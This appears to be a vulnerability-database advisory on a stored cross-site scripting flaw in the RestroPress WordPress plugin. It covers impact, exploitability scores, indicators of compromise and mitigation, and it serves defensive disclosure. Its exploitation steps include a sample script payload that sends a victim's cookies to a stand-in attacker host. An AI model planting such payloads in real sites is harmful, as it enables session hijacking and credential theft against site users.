CVE-2025-69017
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-69017 is a Stored Cross-Site Scripting (XSS) vulnerability in the RestroPress WordPress plugin developed by Magnigenie. It affects RestroPress versions up to and including 3.2.8.4 (with some sources citing up to 3.2.4.2). The vulnerability was published on December 30, 2025, and assigned by Patchstack. It carries a CVSS v3.1 base score of 6.5 (Medium) (Feedly, Patchstack).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). It is a Stored XSS flaw, meaning malicious scripts are persisted server-side and executed in victims' browsers when they view affected pages. Exploitation requires low privileges (an authenticated user) and user interaction from a victim, with the scope changed — indicating the injected script can affect resources beyond the vulnerable component. No public technical write-up or proof-of-concept code has been identified at this time (Feedly).

Impact

Successful exploitation allows an authenticated attacker with low privileges to inject persistent malicious JavaScript into pages served by the RestroPress plugin. When other users (including administrators) view the affected content, the script executes in their browser context, potentially enabling session hijacking, credential theft, unauthorized administrative actions, or further attacks against site visitors. The changed scope means the impact can extend beyond the plugin itself to the broader WordPress site and its users (Feedly).

Exploitability

No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been identified for CVE-2025-69017. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated attacker with at least low-level privileges on the WordPress site (Feedly).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the RestroPress plugin at version 3.2.8.4 or earlier using tools like WPScan or by inspecting plugin metadata in publicly accessible WordPress installations.
  2. Obtain low-privilege access: Register or log in as a low-privileged user (e.g., a customer or contributor account) on the target WordPress site.
  3. Inject malicious payload: Submit a crafted input containing a JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a RestroPress input field that is stored without proper sanitization or escaping.
  4. Trigger victim execution: Wait for an administrator or other user to view the page or content containing the stored payload, causing the malicious script to execute in their browser.
  5. Achieve objective: Harvest session cookies, perform actions on behalf of the victim, or redirect users to attacker-controlled pages (Feedly).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to RestroPress-related endpoints containing HTML/JavaScript tags or encoded script payloads (e.g., %3Cscript%3E, javascript:, onerror=).
  • Database: Unexpected JavaScript or HTML script tags stored in RestroPress-related database tables (e.g., food item names, descriptions, or order fields).
  • Network: Outbound requests from victim browsers to unknown external domains shortly after viewing RestroPress plugin pages, potentially indicating cookie or credential exfiltration.
  • Browser/Client: Unexpected redirects or pop-ups experienced by users browsing pages rendered by the RestroPress plugin.

Mitigation and workarounds

Users should update the RestroPress plugin to a version beyond 3.2.8.4 that includes a fix for this vulnerability. If an updated version is not yet available, administrators should restrict access to RestroPress input fields to trusted users only, and consider temporarily disabling the plugin until a patch is released. Implementing a Web Application Firewall (WAF) with XSS filtering rules can provide an additional layer of defense (Feedly, Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-15239NONEN/A
  • simple-cloudflare-turnstile
NoYesAug 07, 2026
CVE-2026-15211NONEN/A
  • subscriptions-for-woocommerce
NoYesAug 07, 2026
CVE-2026-15148NONEN/A
  • wp-events-manager
NoYesAug 07, 2026
CVE-2026-16265NONEN/A
  • wp-google-map-plugin
NoYesAug 07, 2026
CVE-2026-16263NONEN/A
  • wp-google-map-plugin
NoYesAug 07, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management